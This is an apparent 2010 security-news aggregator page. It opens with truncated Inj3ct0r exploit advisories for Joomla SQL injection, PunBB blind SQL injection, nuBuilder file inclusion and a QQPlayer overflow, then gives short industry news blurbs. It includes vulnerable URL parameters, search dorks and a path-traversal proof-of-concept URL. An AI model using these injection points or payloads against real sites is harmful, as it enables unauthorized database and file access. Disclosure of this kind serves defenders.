Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_livre SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
Joomla Component com_livre SQL Injection Vulnerability
======================================================
# Date: 27/07/2010
# Author : Lagripe-Dz &amp; Mca-Crb
# Category: webapps/0day
# Tested on: [ win xp sp2 ]
# DORK : inurl:&quot;No Dorks 4 Kids&quot;
==========================================================
?
[+] Vulnerable File :
http://www.site.com/index.php?option=com_livres&amp;controller=livre&amp;task=view&amp;cid[]=[SQL]
?
[+] ExploiT [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_educat SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Joomla Component com_educat SQL Injection Vulnerability
=======================================================
# Date: 26/07/2010
# Author : Lagripe-Dz &amp; Mca-Crb
# Category: webapps/0day
# Tested on: [ win xp sp2 ]
# DORK : inurl:&quot;No Dorks 4 Kids&quot;
==========================================================
?
[+] Vulnerable File :
http://www.site.com/index.php?option=com_educat&amp;controller=types&amp;task=show&amp;id=[SQL]
?
[+] ExploiT [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Social Media v2.0.0 LFI Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================
Social Media v2.0.0 LFI Vulnerabilities
=======================================
[x]========================================================================================================================================[x]
| Title : Social Media v2.0.0 LFI Vulnerabilities
| Software [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component TTVideo 1.0 SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================================
Joomla Component TTVideo 1.0 SQL Injection Vulnerability
========================================================
TTVideo 1.0 Joomla Component SQL Injection Vulnerability
Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/
Name TTVideo
Vendor [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PunBB &lt;= 1.3.4 Pun_PM &lt;= v1.2.6 Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================================
PunBB &lt;= 1.3.4 Pun_PM &lt;= v1.2.6 Blind SQL Injection Vulnerability
=================================================================
#!/usr/bin/perl
# [0-Day] PunBB &lt;= 1.3.* Package: Pun_PM &lt;= v1.2.6 Remote Blind SQL Injection Exploit
# Author/s: Dante90, WaRWolFz Crew
# Created: [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>nuBuilder 10.04.20 Local File Inclusion Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
nuBuilder 10.04.20 Local File Inclusion Vulnerability
=====================================================
Software…………….nuBuilder 10.04.20
Vulnerability………..Local File Inclusion
Download…………….http://sourceforge.net/projects/nubuilder/files/
Release Date…………7/5/2010
Tested On……………Windows Vista + XAMPP
————————————————————————
Author………………John Leitch
Site………………..http://cross-site-scripting.blogspot.com/
Email……………….john.leitch5@gmail.com
————————————————————————
–Description–
A local file inclusion vulnerability in nuBuilder 10.04.20 can be
exploited to include arbitrary files.
–PoC–
http://localhost/nubuilder-10.04.20/productionnu2/fileuploader.php?dir=../../../../../../../../windows/system.ini%00
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-27]</pre><script type=’text/javascript’>var [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_booking SQL Injection Vulnerability </title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================================
Joomla Component com_booking SQL Injection Vulnerability
========================================================
###########################
title:Joomla Component (com_booking) SQL Injection Vulnerability
Script : Joomla
Date : 07/26/2010
Author : UnD3rGr0unD W4rri0rZ
Dork : inurl:&quot;option=com_booking inurl:view=hotel&quot;
########################### [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>IE6 / 7 Remote Dos vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================
IE6 / 7 Remote Dos vulnerability
================================
# Exploit Title: IE6 / 7 Remote Dos vulnerability
# Date: 27/07/2010
# Author: Richard leahy
# Version: 6 / 7
# Tested on: Windows Xp Sp3
#category Remote Dos, might lead [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>QQPlayer smi File Buffer Overflow Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
QQPlayer smi File Buffer Overflow Exploit
=========================================
#!/usr/bin/env python
#################################################################
#
# Title: QQPlayer smi File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400p1
# Vulnerable: QQPlayer&lt;=2.3.696.400p1
#
#################################################################
# [...]

Most of the organised hacking rings aiming at bank fraud these days are stealing login credentials and then taking advantage of the relatively recent opportunities provided by online account access, wire transfers and other means for mis-shipping electronic funds.
But a newly discovered Russian group was using networks of compromised personal computers and techniques for hacking [...]

Though I’ve been writing about Internet security for six-plus years, there’s an interesting problem in the industry that I’ve only noticed in the last couple years: Security executives and the hacking community tend to live in different worlds.
Some of you will tell me this is an overblown notion and that I’m making drama where none [...]

What defines an operating system isn’t a geeky label or a collection of ramblings from the mouths of its community members. Nor is it some empty and pointless certification offered up by an obscure group of malcontented purveyors of "standards."
An operating system is a kernel, a supporting cast of programs, and a concept. For certain [...]

Hackers are winning the enterprise security fight according to a Ciscoâ??s 2010 mid-year security report.
The industry is now so highly advanced that malware writers are copy-protecting their own malware and are both better funded and more better than the forces of IT security.
â??Why do hackers succeed?â? said John Stewart, chief security officer at Cisco â??Theyâ??re [...]

It is now officially legal to jailbreak your phone in the US, after a move by the Library of Congress to revise the Digital Millennium Copyright Act, but Apple is still staunchly against the idea, claiming it will brick your jailbroken phone because it loves you, wants you to be happy, and wants to save [...]

Research just released claims to show that IT staff are spending their resources on security to ease customer concerns and establish better levels of online trust.
The survey of more than 700 European IT professionals found that UK IT managers lose more sleep over their customers’ security fears than over direct threats to their websites such [...]

Radio-frequency I.D. (RFID) tags are a convenient way to track items and cut costs for companies. But this technology is increasingly being used to track other things, like security badges â?? or even people â?? giving it the potential to cause a horrific erosion of privacy. Tracking people with smart tags, their shopping preferences, their [...]

Both Mozilla and the Google are raising their rewards for submitted critical vulnerabilities in respective browsers. Mozilla is now paying $3,000 for Firefox bugs and the Google Chromium team is paying $3133.70 ("elite" in hacker leet-speak) for bugs in Chrome, compared to the initial $1,337 reward from six months ago. Ignoring Google’s cheesy figure, it’s [...]

The European Commission today launched two formal antitrust investigations against IBM Corp. over two alleged infringements of EU antitrust rules about abusing a dominant market position, the commission said in a statement. (PDF)
The first case is in response to complaints by software vendors T3 an Turbo Hercules over the tying of mainframe hardware to the [...]

After weeks of stubborn denial from Apple that a problem existed at all, Apple finally said it would do something about the antenna reception issues that customers had been complaining about for weeks. After about 15 minutes of explaining that all smartphones have the same issues and that there really isn’t anything wrong with the [...]

AT&T says it won’t interfere with a highly anticipated talk on intercepting cell phone calls at the Black Hat conference this week, even though rumors are circulating that it will do just that.
Last week, hacker Chris Paget said he plans to demonstrate how to set up what’s essentially a fake cell tower that lets him [...]